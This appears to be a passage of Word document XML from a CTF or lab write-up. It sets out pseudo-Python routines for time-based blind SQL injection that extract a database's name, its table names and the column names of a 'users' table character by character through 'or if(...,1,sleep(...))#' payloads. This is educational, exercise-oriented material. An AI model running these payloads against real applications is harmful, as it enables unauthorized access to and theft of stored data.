      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9BD2C" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"flag"</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t> result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B149A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t> True, item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E024D0E" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69530EB1" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t> False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326778D7" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46939018" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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exe_func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 symbol, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BC735" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> 1 to 9:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5F19B" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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data_len←</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'uname</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>:symbol</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'or if(length('</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>')={0},1,sleep(0.001))#'</w:t>
      </w:r>
      <w:r>
        <w:t>.format(i)      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C728760" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>        result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C02CF8" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"flag.jpg"</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t> result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0789D753" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>            length ← </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E164B97" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485EC1C9" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> 1 to length:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763D255E" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t> j </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CF6FD3" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>            data←</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'uname</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>:symbol</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"or if(substr("</w:t>
      </w:r>
      <w:r>
        <w:t> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t> + f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>",{i},1)='{j}',1,sleep(0.001))#"</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B01C20E" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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    result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7E42BD" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"flag"</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t> result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD33A94" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>j.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>j.upper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757B2B82" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>j.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11412213" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="al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               </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>j.isalpha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4F285" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409893F6" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:pStyle w:val="a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14:paraId="38710E52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spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_tables_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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symbol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F4457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for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 0 to 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2DB4AA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for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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 1 to 20:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7678CFA5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data_len </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>←  '</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>uname':  symbol + " or if((select length(table_name) from information_schema.tables where table_schema=database() limit " + str(ind) + ",1)={0},1,sleep(0.001))#".format(i) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C2F0BE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result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389A6FFB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if "flag.jpg" in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C6CA8D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length ←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</w:p>
    <w:p w14:paraId="405538F2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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20767ED2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for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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 1 to length:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC0F22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for j in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070D8B2F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data ← 'uname': symbol + " or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>substr((select table_name from information_schema.tables where table_schema=database() limit " + str(ind) + ",1),{0},1)='{1}',1,sleep(0.001))#".format(i, j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA1390E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result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request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data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D16A3A8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if "flag" in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08912825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    cols += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDCB30" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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cols_ += cols + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6328CFAB" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00924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  <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB3CE28" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF891C0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spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_columns_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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symbol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC3597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for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0963A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for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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1, 15):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB02DFF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data_len ← 'uname': symbol + " or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(select length(column_name) from information_schema.columns where table_name='users' limit " + str(ind) + ",1)={0},1,sleep(0.001))#".format(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E18473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result ← </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A31083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if "flag.jpg" in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BD382C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length ←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</w:p>
    <w:p w14:paraId="1120CDDF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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3286AE57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for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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 1 to length:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB20A3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for j in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387FEFAC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data ← 'uname': symbol + " or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>substr((select column_name from information_schema.columns where table_name='users' limit " + str(ind) + ",1),{0},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1)='{1}',1,sleep(0.001))#".format(i, j)                </w:t>
      </w:r>
    </w:p>
